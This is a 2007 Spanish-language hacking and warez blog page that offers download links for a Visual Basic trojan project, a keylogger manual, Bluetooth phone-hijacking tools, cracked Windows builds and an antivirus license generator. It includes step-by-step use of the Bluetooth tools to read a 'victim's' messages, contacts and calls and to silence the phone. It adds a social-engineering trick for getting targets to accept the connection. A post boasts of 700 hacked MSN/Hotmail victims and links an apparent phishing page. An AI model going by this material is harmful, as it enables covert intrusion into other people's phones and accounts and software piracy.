| Mobile| RSS

2do wallpepers


No se puede mostrar la imagen “http://img215.imageshack.us/img215/707/contrasecurityhackteamey0.jpg” porque contiene errores.

viernes, 21 de septiembre de 2007 | Tags: | 37 comentario [ Mas... ]

1ro Wallpepers



No se puede mostrar la imagen “http://img217.imageshack.us/img217/3001/544398836a93892c01aocopew8.jpg” porque contiene errores.

CONTRASEGURITY HACK TEAM YA REGRESo

miércoles, 19 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

PAGINA PORNO 100 FREE

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.

HACK MSN LISTADO 700 VICTIMA

http://sournoi.free.fr/templates/enter1

MI PRIMER HOYO NEGRO EN HOTMAIL....

dISFRUTEN ESTOY HACKEADOS BY MAXMASTER

Download Mirrors Start #
badongo.com
megaupload.com
zshare.net
rapidshare.com


martes, 18 de septiembre de 2007 | Tags: | 2 comentario [ Mas... ]

Demostración de Hacking HP [PDF]



En ésta demostración de Hacking de un honeypot y análisis forense, se tocan temas de seguridad informática, como:

* Securización de sistema operativo.
* Instalación y configuración de firewall.
* Instalación y configuración de IDS.
* Instalación y configuración de antivirus y filtrado de contenidos.
* Utilización de protocolos seguros: SSH, SSL, IPSec...
* Mantenimiento: boletines de seguridad, instalar parches...
* Gestión y políticas de seguridad.

Descargar:
http://rapidshare.com/files/53906598/Demostracionforense_Bypriale_.rar
Pass: Bypriale

Hacking - Guía de Iniciación [PDF]


Hacking - Guía de Iniciación [PDF]


Ésta guía está pensada para todo aquel que quiere iniciarse en el mundo del hacking; pero que no sabe por donde empezar. Los conocimientos que se requieren para comprender todo de lo que se va a hablar aquí son: conocimientos de informátia en general, conocimientos amplios de internet (no se les enseñará como buscar en google...) y soltura en el manejo de uns sistema windows.

Descargar:
http://rapidshare.com/files/53895411/Guiadeini_Bypriale_.rar
Pass: Bypriale

Creación de un Troyano en VBasic 6.0


Creación de un Troyano en VBasic 6.0

Aca les dejo este proyecto con el cual todas las personas que manejen lo básico de Visual Basic puedan crear su primer troyano o sistema de administracion remota.

Descargar:
http://rapidshare.com/files/53897923/Creaciondeuntro_Bypriale_.rar
Pass: Bypriale

Cómo hacer un Keylogger


Cómo hacer un Keylogger

El keylogger es un diagnóstico utilizado en el desarrollo de software que se encarga de registrar las pulsaciones que se realizan sobre el teclado, para memorizarlas en un fichero o enviarlas a través de internet. Aquí publicamos un manual que te enseñará a crear tu propio Keylogger en Visual Basic 6.0

Descargar:
http://rapidshare.com/files/53899596/craciondeunKey.rar
Pass: Bypriale

Cómo hacer un Keylogger


Cómo hacer un Keylogger

El keylogger es un diagnóstico utilizado en el desarrollo de software que se encarga de registrar las pulsaciones que se realizan sobre el teclado, para memorizarlas en un fichero o enviarlas a través de internet. Aquí publicamos un manual que te enseñará a crear tu propio Keylogger en Visual Basic 6.0

Descargar:
http://rapidshare.com/files/53899596/craciondeunKey.rar
Pass: Bypriale

Hacker's - Los Clanes de la Red


Hacker's - Los Clanes de la Red

La necesidad de escribir un libro como éste era evidente. La actividad del Hacking fuera del ordenador y de la red de Internet, a cobrado fuerza y es quizas aun más peligrosa que tal como la conocemos a través de los medios de información. Sin embargo, vamos a abordar en éste libro todos los grados del hacktivismo, dentro y fuera del ordenador personal, dentro y fuera del espionaje industrial y en definitiva en todos sus aspectos más conocidos y los menos conocidos. Así, la clandestinidad impera por todas partes; pero no es ese el tono que elegiremos en el presente libro. El Hacking es una realidad y queremos exponer sus fundamentos.

Descargar:
http://rapidshare.com/files/53902863/ClanesRed.rar
Pass: Bypriale

Claudio Hernández - Hacker's II [PDF]


Claudio Hernández - Hacker's II [PDF]

Los piratas del Chip y la Internet, de Claudio Hernández, es un libro que gustará a todos aquellos a los que les guste la informática, o tengan curiosidad por conocer como empezó el mundillo de los hackers, los phreakers y los creadores de virus. El libro esta escrito en forma de relatos cortos de casos reales, en su mayoría estadounidenses, pero con un toque literario que hace que su lectura sea bastante amena. Trata temas como el fraude a las compañías telefónicas haciendo uso de las famosas cajas de tonos, el acceso a redes no permitidas, las primeras detenciones que se hicieron en este ámbito, el primer gusano, virus y troyano, la conspiración de los Illuminati etc...

Descargar:
http://rapidshare.com/files/53901265/lospiratasdelclip_Bypriale_.rar
Pass: Bypriale

Virus Informáticos (Libro + Cuaderno)


Virus Informáticos (Libro + Cuaderno)

De manera permanente se reciben reportes de ataques a redes informáticas, los que se han vuelto cada vez más siniestros: los archivos son alterados, las computadoras se vuelven inoperativas, se ha copiado información confidencial sin autorización, se ha reemplazado el software para agregar "puertas traseras" de entrada y miles de contraseñas han sido capturadas a usuarios inocentes... Estos y otros temas los podrás encontrar en éste libro y cuaderno de práctica, respectivamente.

Descargar:
http://rapidshare.com/files/53905141/Cua_librovinf_Bypriale_.rar
Pass: Bypriale

Diaro de Hacker cansado


Diaro de Hacker cansado

¿Quién dijo que los grandes hackers son de los EEUU o de los países orientales? Espero que esta historia contada por su protagonista sirva para hacer saber que en todos los países hay personas que, movidas por un afán de superación y una inquietud solo comprensible por los que la tenemos, hacen de la Red el mayor laboratorio del mundo.

Descargar:
http://rapidshare.com/files/55059482/Diario_de_un_Hacker_cansado.rar
Pass: Bypriale

Seguridad en Redes


Seguridad en Redes

En primer lugar, se presenta la problemática de la seguridad en las redes TCP/IP. Una vez hayamos visto cuales son los eventuales problemas de seguridad en éste tipo de redes, nos centraremos en los mecanismos de prevención que existen para intentar minimizar la realización de los ataques descritos en el primer módulo. Veremos que, fundamentalmente, las técnicas de prevención se basan en el filtraje de información. Posteriormente pondremos énfasis en las técnicas específicas de protección existentes. En particular, introduciremos las nociones básicas de criptografía que nos permitirán entender el funcionamiento de distintos mecanismos y aplicaciones que permiten protegerse frente los ataques.

Descargar:
http://rapidshare.com/files/55059948/SegRedes.rar
Pass: Bypriale

Ingeneria de software


Roger S. Pressman

Cuando un software de computadora se desarrolla con éxito -cuando satisface las necesidades de las personas que lo utilizan; cuando funciona impecablemente durante mucho tiempo; cuando es fácil de modificar o incluso es más fácil de utilizar- puede cambiar todas las cosas y de hecho las cambia para mejor.
Ahora bien, cuando un software decomputadora falla -cuando los usuarios no se quedan satisfechos, cuando es propenso a errores; cuando es difícil de cambiar e incluso más difícil de utilizar- pueden ocurrir y de hecho ocurren verdaderos desastres. Todos queremos desarrollar un software que haga bien las cosas, evitando que esas cosas malas merodeen por las sombras de los esfuerzos fracasados. Para tener éxito al diseñar y construir un software necesitaremos disciplina. Es decir, necesitaremos un enfoque de ingeniería.
Aquí les dejo el libro de Roger S. Pressman, en un solo archivo para que se haga más fácil la descarga. Si aún no saben descargar de RapidShare, visiten nuestra Ayuda.

Descargar:
http://rapidshare.com/files/55068773/RogerPressman.part1.rar
http://rapidshare.com/files/55070795/RogerPressman.part2.rar
http://rapidshare.com/files/55072668/RogerPressman.part3.rar
Pass: Bypriale

Cell-nueva Novela Stephen King ( Tematica Zombie)



TITULO: CELL

AUTOR: STEPHEN KING

IDIOMA: TRADUCIDA AL CASTELLLANO

RESUMEN:

El día 1 de octubre a las 15:03 se envían mensajes a través de los teléfonos móviles que convierten a todos los que los reciben en zombies asesinos... Se desata una locura criminal y destructiva de la que pocos escaparán, y los que lo logren tendrán que sobrevivir en un mundo totalmente transformado. Terror puro, el retrato de un mundo escalofriante que nunca volverá a ser el mismo.

LINKS: http://www.megaupload.com/?d=39MKDBUI

Referencia de ActionScript para Flash MX 2004



Este texto es la referencia para programar en el lenguaje ActionScript, usado en la animación en Flash MX

Descarga:

http://rapidshare.com/files/56045309/REFERENCIA_DE_ACTIONSCRIPT.PDF

415 Themes for Nokia

5000 Mobile Wallpapers

954 juegos JAVA de todo tipo

Nombre: Gran coleccion de jusgos JAVA
Tipo: Java para telefonos mobiles



DEscargar:
http://rapidshare.com/files/36382904/D_Great_Collection.part1.rar
http://rapidshare.com/files/36387943/D_Great_Collection.part2.rar

Password:
Sam Fisher

Movil Hacker v1.5

Hola.! Amigo yo tengo un programa con el que puedes hacer muchas cosas nomas de ver los mensajes tambien puedes llamar, apagar el cel, reproducir su musica, jugar sus juegos y otras cosas por ahi todo esto se hace por bluetooth lo puedes descargar de aqui

http://www.badongo.com/file/3149626

espero y te sirva amigo

Super-Bluetooth-Hack+mas

Super-Bluetooth-Hack_by_rubiolas.zip






Una nueva versión del programa Super Bluetooth hack que nos permite, mediante un dispositivo móvil bluetooth, administrar remotamente otro dispositivo con bluetooth.
Al parecer, sólo funciona en determinados modelos y te permitiría hacer cosas como:
- Leer sus mensajes
- Ver sus contactos y sus No, telefónicos
- Cambiar el perfil
- Reproducir una canción aunque este en vibrador
- Reiniciar el móvil
- Apagarlo
- Restaurar todos los cambios a "por defecto"
- cambiar el volumen del celular
- Escucharlos ringtons
- Eescuchar sus canciones (en su teléfono)
- Desconectar su teléfono, etc.



Este programa es fácil de instalar y manejar, funciona muy bien con los Sony Ericsson .


Notas:
1.) Al conectar los dispositivos utilizan un código 0000
2.) En el comienzo del programa en smartphones no olvidar girar el bluetooth antes comenzar su uso


Con motorola:-los suben con el MotoMidMan
-lo suben como jar y eso es todo


Para usarlo es simple.
Vas a settings y dejas tildado lo que quieras hacer.
Luego vas a connect, elege la primera opcion y vas a establecer la busqueda de equipos.
Luego de aca tenes 2 posibilidades.
1º que cuando preciones select el soft funcione y puede hacer x cosa en el tel.
2º que cuando preciones select no haga nada.

En el segundo caso, tomas los datos del telefono (nombre del dispositivo, y mac addrees) y estableces un nuevo contacto en el BT info de forma manual. Luego de eso selecionas dicho equipo, y ahi vas a tener las opciones segun lo que quieras hacer.

Este soft funciona joya contra un Sony Ericson. Algunos motorola, y algunos nokia. No tuve la posibilidad de probarlo demasiado.
Otro de los temas, es que la persona tiene que aceptar tu peticion de conexion, o sea, se tienen que vincular los equipos, de no ser asi, no vas a poder hacer nada.

aquí les dejo algunas recomendaciones para Aumentar la Seguridad de tu Celular con Bluetooth:

1. Manten apagado su Bluetooth, no solo consume batería extra sino que deja una puerta abierta para que otras personas entren a su celular (activelo solo cuando necesite usarlo).

2. Si quieren dejar activo el bluetooth, configurenlo en modo “oculto”, [Menú>Conectividad>Bluetooth>Configuración Bluetooth>Oculto] (esta ruta suele cambiar con cada teléfono pero te dará una idea de donde se encuentra).

3. es recomendable también que en el nombre del dispositivo no pongan “Celular de Juanita”, un nombre como “Not Found” llamará menos la atención de un posible atacante.

Recuerden que funciona bien en celulares con bluetooth 1.x, en celulares nuevos pide autorización para poder entrar… aunque con un poco de ingeniería social (eje poniendo como nombre de tu dispositivo… [Tienes Un nuevo Mensaje, Acepta para Leerlo]) lograras que la otra persona acepte tu conexión por bluetooth.



El link es el siguiente
http://www.megaupload.com/?d=B8W3OU3X



Mirror:
en gigasize (para los que pedian)


http://www.gigasize.com/get.php/-1099586180/Super-Bluetooth-Hack_by_rubiolas.zip

Super-Bluetooth-Hack_by_rubiolas EN RAOIDSHARE

LAS INDICACIONES LAS VEN EN EL OTRO POST

YO LO BAJE Y LO MONTE EN RAOIDSHARE



http://rapidshare.com/files/51262762/Super-Bluetooth-Hack_by_rubiolas.zip.html

1.- Bueno mira primero conectas el cel a la compu normal como siempre lo haces pasas el archivo .JAR a la carpeta de otros... (o donde tu desees).

2.- desconectas el cel de la pc y te vas a carpeta donde lo pusistes y luego lo instalas en aplicaciones o en juegos donde tu desees

3.- Después vas a la carpeta donde lo instalastes y lo ejecutas y te indica que si quieres Permitir a la aplicacion crear una conexion bluetooth de servidor le dices que si.

4.- Después vas a search Devices y te detectara a las personas que tienen activado su bluetooth.

OJO_ Ustedes tambien deben tener activo su bluetooth

jejeje se me olvidaba cuando inician x 1era vez el archivo les dice en que idioma lo desean tener en este kaso ponen ingles.

ahhh se me paso aki les dejo un link de lo que hace el programa.

Video Del Programa:
http://www.youtube.com/watch?v=oEchXbi6y6g

y como soy buena gente les dare otro link de descarga del programa para que lo tengan en español.

Mirror BT INFO EN ESPAÑOL:
http://rapidshare.com/files/49668650/bt_info_107_incl_sp.rar

Midpx emulador java para probar tus juegos antes de subirlos al movil

Pack de 48 juegos para motorola 128x128, algunos de los juegos son: Asphat 3, asphalt urban gt 2, lost, king Kong pinball, Fast and Furious tokio edition.

Enlace de Rapidshare.

http://rapidshare.com/files/54780502/juegos_motorola_128x128.rar


Midpx es un emulador que te permite probar los juegos antes de subirlos al movil.

No funciona con todos los juegos, los juegos tienen que estar en el disco duro para que funcione.

Si te pone una barra de de navegación en el explorador de Windows se borra al desinstalar.

Yo lo uso y funciona con casi todos los juegos.


http://rapidshare.com/files/55912921/emulador_java.rar

Bluetooth Hacker En español!!!! + manual de uso

Bluetooth hacker en español



Bluetooth hacker es un programa que funciona el la mayoria de celulares con soporte java
y con dispositivos bluetooth, que permite acceder a una conexion con otro celular por via bluetooth y acceder a funciones como las siguientes:

>>>Informations Aqui vas a encontrar toda la informacion del Celular incluso el IMEI.
>>>Ringing Aqui podras modificar las opciones de sonido.
>>>Calls Puedes checar las llamadas del celular.
>>>Change language Cambia el idioma del celular.
>>>Keys Modifica las funciones del Teclado.
>>>Pressed Keys Te aparecera el teclado en la pantalla el de un w800.
>>>Phonebook Directorio del Telefono o SIM.
>>>Reading SMS Lee los mensajes de la Victima.
>>>Silent Mode Si no kieres que se de cuenta de lo que haces pon su movil en modo silencio.
>>>Phone Functionality Aqui estan las funciones Master, desde apagar el celular hasta, Reseteo general. El mejor .
>>>Ring Volume Modifica el volumen alto/bajo.
>>>Profiles Ve el perfil de configuracion de sonidos.
>>>Java Aqui puedes ver las aplicaciones JAVA del movil.
>>>MediaPlayer Si el movil de la victima tiene reproductor mp3 tu lo podras utilizar.
>>>Text Escribe un mensaje de Texto.
>>>Custim Command Cambia la configuracion que viene de fabrica.
>>>Connection Entra al Browser y modifica su conexion IGPRS.


Ademas incluye un manual para que aprendas a utilizarlo.

Funcina con la mayoria de celulares.


Link: http://www.gigasize.com/get.php/3195535778/Bluetooth_Hacker_-__By_AAOA_Technology.zip


Espero que les sirva!

XP Plus!:



XP Plus!:

El complemento definitivo para Microsoft Windows XP, Microsoft Plus! para Windows amplía su experiencia con el PC con potentes herramientas de multimedia digital, intensos juegos en 3-D e impresionantes gráficos en 3-D. Con Plus! para Windows, conseguirá un mayor entretenimiento, más control y más diversion.

El Archivo se encuentra en formato ISO de Imagen para copiar a un CD virgen. esto lo podes hacer con Nero o algun soft similar.

Link:

http://www.gigasize.com/get.php/1272149/PlusXP.iso

WIndows XP estilo Vista para Pentium I y II en Español



INFORMACION

SuricataOS 3 Fiction Edition: es la version de Windows XP mas rapida del mundo. Consigue que el sistema arranque de forma rapida, consumiendo MENOS DE LA MITAD DE RAM que el Windows XP original. Siente el placer de poder usar tus juegos con mas memoria libre y mas estabilidad. Siente el placer de usar SuricataOS 3 Fiction Edition
Optimizacion: Extrema

Basado en Windows XP PRO + SP2 Este es un Sistema Operativo Modificado, Optimizado para que funcione mas rapido.
Ademas de modificaciones varias en cuanto a rendimiento, aspecto y seguridad, la instalacion se realiza en solamente 20 minutos, y donde el uario solo elige la particion a instalar, y el CD bootable har� el resto por su cuenta, no mas introduccion de claves, ni horarios, etc.
Luego de esta instalacion desatendida, llega la hora de elegir los programas a instalar, mediante un menu de facil comprension podremos elegir que aplicaciones necesitamos, grabar CD, modificar fotos, etc. Al igual que el Windows, una vez elegidos los programas, se instalarand e forma TOTALMENTE AUTOMATICA, sin la necesidad de elegir �Siguiente� u otras opciones comunes de las instalaciones.
Eso no es todo, para esta version ademas, las aplicaciones son TODAS PORTABLES, y se podran acceder a ellas mediante un practico menu inicio. Con esto logramos no ensuciar el registro y lograr la maxima estabilidad, ademas de poder borrarlas con un simple delete, o grabarlas en un CD o en un PenDrive y llevarlas donde queramos, ya que NO NECESITAN INSTALACION, simplemente, copiar y pegar.

Requerimientos Minimos:

* 700Mb en Disco (1,5Gb para instalar todos los programas)
* 32MB RAM
* Pentium 133Mhz
* Video 4Mb

Requerimientos Minimos Recomendados:

* 1,5Gb en Disco
* 64MB RAM
* Pentium 2 233Mhz
* Video 16Mb (Savage o Superior) (recomendado TNT2 o Superior)

Lista de Programas que trae el CD
NOTA: Son todos portables

* Portable 1 Video Converter
* Portable 7Zip
* Portable ABA Games Suite
* Portable AdAware
* Portable Agenda
* Portable Alcohol 120
* Portable BandWidth Monitor
* Portable BitComet
* Portable Blender
* Portable BSPlayer (Vista SKinned)
* Portable Claim
* Portable CoolPDF
* Portable Disk
* Portable Disk Defrag 1.0
* Portable DreamKana
* Portable Emule
* Portable Firefox2
* Portable FlashGet
* Portable Foobar2000
* Portable Gaim
* Portable Generally105
* Portable Gimp
* Portable HDD Life
* Portable ImagetoMP3
* Portable ImgBurn
* Portable LearnKana
* Portable MSN (Techno Skined)
* Portable Nero 7.2
* Portable NOD 32
* Portable Open Office
* Portable Opera 9
* Portable Photoshop 7
* Portable Recover my Files
* Portable Registry Mechanic 6
* Portable Skype
* Portable Sodoku
* Portable Start Manager
* Portable SunBird
* Portable ThunderBird
* Portable TuneUp Utilities
* Portable UniExtract
* Portable uTorrent
* Portable Visual Basic 6
* Portable Whats Running 2.2
* Portable Winamp
* Portable WinRAR
* Portable XNResource Hacker
* Portable YamiPOD
* Portable Your Unistall 06

DESCARGA: Son 14 partes agrupadas y subidas a Megaupload
http://www.megaupload.com/?d=UIGSX1SB
http://www.megaupload.com/?d=8UMRBIGO
http://www.megaupload.com/?d=5YDHK6FZ
http://www.megaupload.com/?d=0MXJUHHY

Rapidshare:
http://rapidshare.com/files/6838189/SURFiction.part01.rar
http://rapidshare.com/files/6827024/SURFiction.part02.rar
http://rapidshare.com/files/6816866/SURFiction.part03.rar
http://rapidshare.com/files/6806664/SURFiction.part04.rar
http://rapidshare.com/files/6793646/SURFiction.part05.rar
http://rapidshare.com/files/6778741/SURFiction.part06.rar
http://rapidshare.com/files/6766181/SURFiction.part07.rar
http://rapidshare.com/files/6683423/SURFiction.part08.rar
http://rapidshare.com/files/6673950/SURFiction.part09.rar
http://rapidshare.com/files/6665171/SURFiction.part10.rar
http://rapidshare.com/files/6653340/SURFiction.part11.rar
http://rapidshare.com/files/6642754/SURFiction.part12.rar
http://rapidshare.com/files/6632561/SURFiction.part13.rar
http://rapidshare.com/files/6619872/SURFiction.part14.rar

MAS IMAGENES:
Foto del consumo ed memoria:



Anonym.OS

Anonym.OS, un Sistema Operativo para el ANONIMATO




Aquellos para quienes el anonimato y la privacidad en Internet se hayan convertido en una obsesión pueden dar un paso más y utilizar no ya una herramienta sino todo un sistema operativo diseñado para garantizarlos. Anonym.OS es un sistema operativo OpenBSD 3.8 cargado en un CD en vivo. Se trata de un sistema operativo especialmente centrado en la seguridad, acompañado de potentes herramientas para anonimizar y cifrar las comunicaciones. Entre otras características, aleatoriza la dirección MAC de la tarjeta de red durante el inicio, proporciona aplicaciones de red configuradas para sacar partido de la red de encaminamiento de Tor, accesible a través de un sencillo interfaz gráfico. Como todos los CD en vivo, puede arrancarse desde cualquier ordenador sin necesidad de hacer particiones ni arranques duales, simplemente reiniciando el equipo y arrancando desde la unidad de CD.

Anonym.OS LiveCD:

Anonym.OS es quizás el primer Live CD basado en OpenBSD (v3., destinado a ofrecer una privacidad absoluta: todo en la forma en que se reporta a otras computadoras en la red está diseñado para identificarse como un Windows XP SP1, hasta el tamaño de sus paquetes TCP.

Hace un extensivo uso de Tor, la red de servidores que pasa tráfico encriptado para permitir navegacion imposible de rastrear. Sin embargo, actualmente la Tor, con 419 servidores, esta sufriendo un enorme crecimiento de usuarios, lo que puede afectar su performance en horarios picos. Sus autores dicen que Anonym.OS es sólo el primer paso en hacer del anonimato algo
ampliamente disponible: proxima versiones se ejecutarón en un drive USB.


















Descarga:

Code:

http://rapidshare.com/files/534312/anonymos-shmoo_-_subido_por_checo38.part1.rar
http://rapidshare.com/files/711314/anonymos-shmoo_-_subido_por_checo38.part2.rar
http://rapidshare.com/files/714392/anonymos-shmoo_-_subido_por_checo38.part3.rar

Win Xp WareXone Edition 64mb de ram o mas






Este es un Windows Xp tipo vista que tiene varios cambios para bien, como por ejemplo que es DESATENDIDO es decir que no necesitas ponerle el serial, no te pregunta si la pc esta en la red, con un sistema operativo optimizado y mas rápido.


Eso no es todo, si no que tambien esta versión incluye una lista de programas para que se autoinstalen y se registren solos, sin nada mas que hacer un click, cuando se termina la instalación, se abrira una lista con los programas que tiene el S.O y tu elijes que instalar y que no, para que sea mucho mas comodo para todos y no tener que andar poniendo y sacando cds cada ves que se formatea


Requisitos minimos:
==>64mb de ram o mas
==>333mhz de procesador o mas
Idioma: Español

Contiene windows xp sp2 hasta este mes.. abril



Esta es la Lista de Programas que incluye:
1 .Net Framework 1.1 SP1
2 .Net Framework 2
3 Ad-Aware Pro 1.0.6
4 Adobe Reader 7.0.8 (Lite)
5 Alcohol 120% 1.9.6.4719
6 BSPlayer Pro 2.15 Build 946
7 CCleaner 1.34.407
8 Damn NFO Viewer
11 Everest Ultimate Edition 3.50.761
12 Mozilla Firefox 2.0.0.3
13 Flash 9.0.16.0 y Shockwave 10.1.4.20
18 Internet Explorer 7
19 Java RE Version 5 Update 9
20 K-Lite Codec Pack 2.79 Full
21 MSN Messenger Live 8
22 Nero Burning Rom 7.5.7.0 Lite
23 NOD32 Antivirus System 2.51
24 Microsoft Office 2003 SP2 (actualizado)
25 WMP11
26 PowerDVD 7 Deluxe
27 QuickTime Alternative 1.76
28 Real Alternative 1.51
29 Unlocker 1.8.5
30 uTorrent 1.6
31 Virtual Desktop Manager Powertoy
32 Winamp 5.33 Full + MMD3 Theme
33 WinRAR 3.62 + Theme
34 Desactivar la barra de idioma
35 Activar Auto-Arranque CD/USB
36 Activar vista previa de películas
37 Flash Get 1.81
38 Windows Defender
39 Tune Up utilities 2007 Portable
40 Lime wire 4.12 Portable
41 Winrar gold tools
42 Total video converter 3.10

descargalo de aqui:

http://www.badongo.com/es/file/2862818

o de aqui:

http://www.gigasize.com/get.php/1237496/WinLite.rar


Pueden descargarlo con confianza... ya que funciona muy bien.

Windows 2000 Actualizado Desatendido + IE6, WM9, DX9, Framework 1



Bueno ya que lo pidieron lo cuelgo aqui no se en que estado esta ya que lo pogo tal como lo encontre en la web repito lo pongo por que lo pidieron ok no preguntar sobre instalacion que contiene ni nada sobre este sistema ya que si estas descargando un sistema operativo y no sabes para que lo estas haciendo ni como usarlo mejor dejalo a los que si saben o pregunta algun conocido que te pueda informar ok.

Windows 2000 Actualizado Desatendido con todos sus parches integrados en la instalacion aparecidos hasta la fecha (1/05/2007) y desatendido.
Tambien integrado las siguientes aplicaciones:
Internet Explorer 6
Directx 9
Framework 1
Framework 2
Windows Media Player 9


Aplicacion: Windows 2000 Actualizado Desatendido + IE6, WM9, DX9, Framework 1 y 2
Formato: ISO
Comprimido: Winrar 3.62
Idioma: Español
Partes: 4 Partes de 95MB y una 32MB
Serial: Integrado
Testeado: Vmware OK.
Actualizado a: 1/05/2007

Lista de parches incluidos:
Parches para windows
KB842773, KB891861-v2, KB893756, KB896358
KB896422, KB896423, KB899587, KB899589
KB900725, KB901017, KB901214, KB904706-DX9
KB905414, KB905749, KB908519, KB908531-v2
KB911280-v2, KB912919, KB913580, KB914388
KB914389, KB917008, KB917344, KB917422
KB917736, KB917953, KB918118, KB920213
KB920670, KB920683, KB920685, KB921398
KB922582, KB923191, KB923414, KB923689
KB923980, KB924191-v2, KB924270, KB924667
KB925902, KB926121, KB926436, KB928843
KB930178, KB931784, KB932168

Parches IE
KB905495, KB928090, KB929969, KB923694

Parches MDAC
KB927779, Q832483

Parches Windows Media Player
KB911564, Q828026, KB925398, KB917734
KB917734

Parches Varios:
KB893803
OJO SOLO LO ENCONTRE EN MEGAUPLOAD

http://www.megaupload.com/?d=G7CYW1LP
http://www.megaupload.com/?d=J309FYMB
http://www.megaupload.com/?d=HYHVXRM2
http://www.megaupload.com/?d=N1Z3G9PA
http://www.megaupload.com/?d=BWG74J1G

Fichero para renombrar:
http://www.MegaShare.com/168179

Fichero MD5:
http://www.MegaShare.com/172818Windows 2000 Actualizado Desatendido + IE6, WM9, DX9, Framework 1

Windows XP SP2 Corporativo

Windows Xp Professional Sp2 ACtualizado

Flash Paper MX - herramienta de para creacion de PDF y SWF.






Adobe Flash Paper MX, es una herramienta que se instala como una impresora y permite la creación de documentos en PDF y SWF (Flash), que hacen más livianos los ficheros y su compresión. Para Windows.

Descargar aquí: http://www.megaupload.com/es/?d=889TS3DN

IDIOMA: INGLES FACILIDAD DE USO: 9/10 TAMAÑO: 14 Mg

MaxiVista Mirror Pro Edition v2.0.19l



Si queremos extender nuestro monitor a doble pantalla o bien clonar la pantalla sobre la que trabajamos en otra pantalla de ordenador, una gran utilidad para Windows es Maxivista.

Además el ordenador principal tiene que ser Windows 2000/XP/2003 pero el secundario puede ser cualquier Windows, Linux con Wine o incluso Mac con Virtual PC.

Aplicacion: 2.27 MB

http://rapidshare.com/files/53287831/MaxVtaMpro.rar

Manual en ingles:

http://rapidshare.com/files/53287267/maxivista_manual.pdf

atomix 2.3 full

atomix 2.3 full
El hermano menor del Virtual DJ , pero Igual de poderoso y entretenido

esta vez les Traigo la version completa en español con skins y efectos


listo para instalar sin crackear, copiar ni nada

obviamente hecho por Artistas incomprendidos




http://rapidshare.com/files/52657064/ATOM_BY_DJ_MARTE.rar.html

(11387 KB)


Hagamos la red !!

| Tags: | 0 comentario [ Mas... ]

NOD32 2.7 VERSION COMERCIAL + GENERADOR DE LICENCIA ORIGINAL




LES PRESENTO AL ANTIVIRUS MAS PODEROSO DE TODA LA RED, ES CAPAZ DE DETECTAR LOS VIRUS POTENCIALMENTE MAS PELIGROSOS.

ES LIVIANO Y NO CONSUME MUCHA MEMORIA
ES COMPATIBLE CON:
WINXP/ WINDOWS VISTA

EL PACK VIENE CON UN GENERADOR DE CLAVES QUE TE ACTUALIZA LA LICENCIA AUTOMATICAMENTE A TRAVES DE INTERNET Y FUNCIONA AL 100%

TAMBIEN TRAE UN ACTUALIZADOR DE LICENCIA PARA AQUELLOS QUE NO TIENEN INTERNET EN CASA.

PARA SU INSTALACION SOLO LEES EL ARCHIVO PDF Y LISTO

DESCARGALO Y LUEGO ME CUENTAS

NO TE OLVIDES DE VOTAR


ENLACE DE DESCARGA:

http://rapidshare.com/files/53491335/NOD32_Comercial.rar

Encarta 2008 en español - 100% español ORIGINAL


hola manes aca les traigo encarta 2008 es españal 100% español estan subidas a diferentes servidores para ser descargado facilmente ya no pierdas ams tiempo descarga del servidor que mas te guste sin demoras y espera
http://rapidshare.com/files/53626229/microsoft_encarta_student_2008_spanish_bypriale_.rar

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter